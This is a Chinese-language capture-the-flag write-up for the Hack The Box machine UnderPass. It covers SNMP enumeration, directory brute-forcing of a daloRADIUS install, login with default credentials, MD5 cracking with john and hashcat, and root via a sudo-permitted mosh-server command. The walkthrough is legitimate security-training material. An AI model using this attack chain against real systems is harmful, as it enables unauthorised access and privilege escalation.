UnderPass

https://app.hackthebox.com/machines/UnderPass

受害者ip：10.10.11.48

攻击者ip：10.10.16.12

参考：https://www.hyhforever.top/htb-underpass/

https://medium.com/@0xindranil/htb-underpass-da984bfe2e85

https://blog.csdn.net/qq_52772100/article/details/145062562

端口扫描

80端口是apache的默认页面，并且目录也是空的

使用udp协议扫描

发现开放161snmp服务

nmap -sU --min-rate 1000010.10.11.48 -oA udp            

SNMP（Simple Network Management Protocol）是一种用于管理网络设备的协议。它允许网络管理员监控网络设备的性能和状态，以及进行故障排除和配置更改。SNMP通过在网络设备上运行的代理程序收集有关设备的信息，并将这些信息发送给网络管理系统。网络管理系统可以使用这些信息来了解网络设备的状态，以便及时发现和解决问题。SNMP还可以用于配置网络设备，例如更改设备的IP地址或路由表。

SNMP协议采用轮询机制，提供最基本的功能集，适合小型、快速、低价格的环境使用，而且snmp协议以用户数据报协议（UDP）报文为承载，因而受到绝大多数设备的支持，同时保证管理信息再任意两点传送，便于管理员在网络上的任何节点检索信息，进行故障排查

snmpwalk 是一种常用的网络管理工具，用于通过 SNMP（Simple Network Management Protocol，简单网络管理协议） 从目标设备获取信息。它会递归地遍历目标设备的 MIB（Management Information Base，管理信息库），提取各种数据，比如系统信息、网络接口状态、路由表、设备运行时间等。

snmpwalk -c public -v2c 10.10.11.48            -c public：            指定社区字符串为 public，这是默认的只读访问字符串。            -v2c：            使用 SNMP v2c 协议（比 v1 和 v3 更常用，支持更大数据集传输）。            SNMPv2-MIB::sysDescr.0： 操作系统描述。            SNMPv2-MIB::sysUpTime.0： 设备运行时间（从最后一次启动开始）。            SNMPv2-MIB::sysContact.0： 设备管理员的联系信息。            SNMPv2-MIB::sysName.0： 设备名称。            SNMPv2-MIB::sysLocation.0： 设备位置。            

steve可能是某个用户名，将underpass.htb加入到host

其中提示有daloradius服务

iso.3.6.1.2.1.1.4.0 = STRING: "[email protected]"iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"

echo "10.10.11.48 underpass.htb" >> /etc/hosts             

目录扫描

dirsearch -u underpass.htb/daloradius -t 100

发现文件/daloradius/docker-compose.yml，docke配置文件里面有mysql的账号密码radius/radiusrootdbpw

搜索到默认账号密码

administrator/radius

在这里也能找到默认账号密码

http://10.10.11.48/daloradius/doc/install/INSTALL

扫描app目录

dirsearch -u underpass.htb/daloradius/app -t 100 

或者使用-r参数递归扫描

dirsearch -u underpass.htb/daloradius/ -t 100 -r 

然后就能找到登录口

users的登录口进不去，可能是兔子洞。换一个大点的字典再扫一下，找到operator

dirsearch -u "http://underpass.htb/daloradius/app/" -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt            

http://underpass.htb/daloradius/app/operators/login.php

使用默认账号密码成功登录

Username: administratorPassword: radius

似乎这个版本并没找到有效的poc

回到首页发现用户名svcMosh和他的md5密码

解密后svcMosh/underwaterfriends 

john爆破

john --wordlist=/usr/share/wordlists/rockyou.txt md5.txt --format=Raw-MD5

hashcat爆破

hashcat '412DD4759978ACFCC81DEAB01B382403' -m 0 -a 0 /usr/share/wordlists/rockyou.txt

直接ssh连接，然后sudo -l起手

ssh [email protected]

Mosh表示移动Shell(Mobile Shell)，是一个用于从客户端跨互联网连接远程服务器的命令行工具。它能用于SSH连接，但是比Secure Shell功能更多。它是一个类似于SSH而带有更多功能的应用。程序最初由Keith Winstein 编写，用于类Unix的操作系统中，发布于GNU GPL V3协议下

--client=PATH：指定本地机器上的 Mosh 客户端路径。            --server=COMMAND：指定远程机器上运行的 Mosh 服务器命令。            --predict=adaptive|always|never|experimental：控制本地回显的行为，适用于不同的网络延迟条件。            -4, -6, --family=inet|inet6|auto|all|prefer-inet|prefer-inet6：指定网络协议（IPv4 或 IPv6）。            -p PORT[:PORT2]：指定服务器端使用的 UDP 端口或端口范围。            --ssh=COMMAND：用于建立会话的 SSH 命令。            --no-ssh-pty：在 SSH 连接中不分配伪终端。            --local：在本地运行 mosh-server，不使用 SSH。            --help：显示帮助信息。            --version：显示版本和版权信息            

使用--server参数连自己达到提权效果

mosh --server="sudo /usr/bin/mosh-server" localhost

原文始发于微信公众号（王之暴龙战神）：UnderPass